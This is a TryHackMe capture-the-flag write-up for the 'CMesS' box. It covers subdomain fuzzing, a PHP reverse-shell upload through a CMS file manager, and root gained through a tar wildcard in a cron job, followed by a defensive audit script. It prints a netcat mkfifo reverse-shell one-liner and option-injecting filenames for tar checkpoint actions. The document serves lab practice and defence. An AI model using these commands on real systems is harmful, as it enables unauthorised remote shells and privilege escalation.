
Write Up

CMesS

TryHackMe Medium 140 pts Linux Room ↗

Overview

This writeup documents exploitation of a medium-difficulty box involving enumeration to discover CMS credentials, PHP shell upload, and privilege escalation through wildcard exploitation in a root-level cron job.

Enumeration

Initial Nmap Scan

nmap -v -sV -sC -oA nmap cmess.thm

Results revealed:

Subdomain Discovery

After initial enumeration proved unproductive, wfuzz was used to identify subdomains:

wfuzz -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -H "Host: FUZZ.cmess.thm" --hl 107 -u cmess.thm

Result: Found dev.cmess.thm containing exposed credentials.

Admin Panel Access

Credentials successfully authenticated against cmess.thm/admin.

File Manager Exploitation

Accessed the file manager at /admin/fm to exploit an LFI vulnerability. This exposure allowed:

Shell Acquisition

After uploading the reverse shell:

nc -nvlp 4443

Accessed the shell via http://cmess.thm/assets/php-reverse-shell.php, then upgraded to interactive bash:

python3 -c 'import pty; pty.spawn("/bin/bash");'

Privilege Escalation

User Flag

Manual enumeration of /opt/ revealed additional credentials for user andre. SSH access was established and user.txt obtained.

Root Exploitation

Linpeas identified a critical vulnerability: a cron job running every 2 minutes as root that invoked tar with a wildcard. Because the shell expands the wildcard before tar sees its arguments, any file whose name looks like an option is passed to tar as one. Exploited this through tar's checkpoint arguments:

echo "mkfifo /tmp/obizbxg; nc 10.4.14.205 4444 0</tmp/obizbxg | /bin/bash >/tmp/obizbxg 2>&1; rm /tmp/obizbxg" > shell.sh

Created empty files whose names are expanded by the wildcard into tar options:

echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Set up a listener and waited for the root-level callback, obtaining the final flag.
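As an added, defender-side example that is not part of the original writeup: a small shell script that spots the artefacts this technique leaves behind (option-shaped filenames in the backed-up directory, cron lines that feed a bare "*" to tar) and shows the archiving form that is immune to it. The cron sample, scratch paths and the "pwned" sentinel are constructed for the demonstration.

```shell
#!/usr/bin/env bash
# Added example (not from the writeup): checks for the tar wildcard weakness
# exploited above. All paths and sample lines here are constructed.
set -u

# Print the filenames in DIR that begin with '-'. Option-shaped files are
# the artefacts an attacker drops so that an unquoted "*" in a cron job
# expands them into tar arguments such as --checkpoint-action=exec=...
find_option_like_names() {
    local dir=$1 f
    for f in "$dir"/-*; do
        [ -e "$f" ] && printf '%s\n' "${f##*/}"
    done
    return 0
}

# Flag cron lines that run tar with a bare "*" after the command, the
# pattern that hands filenames to tar as options. Exit status 1 = none found.
audit_cron_for_globs() {
    grep -nE 'tar[^#]*[ /]\*' -- "$@"
}

# Hardened archiving: tar gets a fixed directory and "." as its only member,
# so the shell never expands filenames into tar's argument list.
safe_tar_backup() {
    local src=$1 dest=$2
    tar -cf "$dest" -C "$src" .
}

# Demonstration on a scratch directory holding the two option-shaped names.
demo() {
    local work cron
    work=$(mktemp -d)
    cron=$(mktemp)
    echo "touch '$work/pwned'" > "$work/shell.sh"        # would run if exploited
    : > "$work/--checkpoint-action=exec=sh shell.sh"
    : > "$work/--checkpoint=1"
    echo '*/2 * * * * root cd /srv/data && tar -czf /var/backups/data.tgz *' > "$cron"

    echo "option-like names:"; find_option_like_names "$work"
    echo "risky cron lines:"; audit_cron_for_globs "$cron" || true
    safe_tar_backup "$work" "$work.tar"
    [ -e "$work/pwned" ] && echo "checkpoint action executed!" || echo "no code ran"
    echo "archive members:"; tar -tf "$work.tar"
    rm -rf "$work" "$work.tar" "$cron"
}
demo
```

The safe form still archives the odd-named files as ordinary members; only the unquoted glob in argument position made them dangerous.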

Key Takeaways

This box emphasized enumeration fundamentals (subdomain discovery), CMS-specific vulnerabilities, and wildcard exploitation in shell globbing contexts.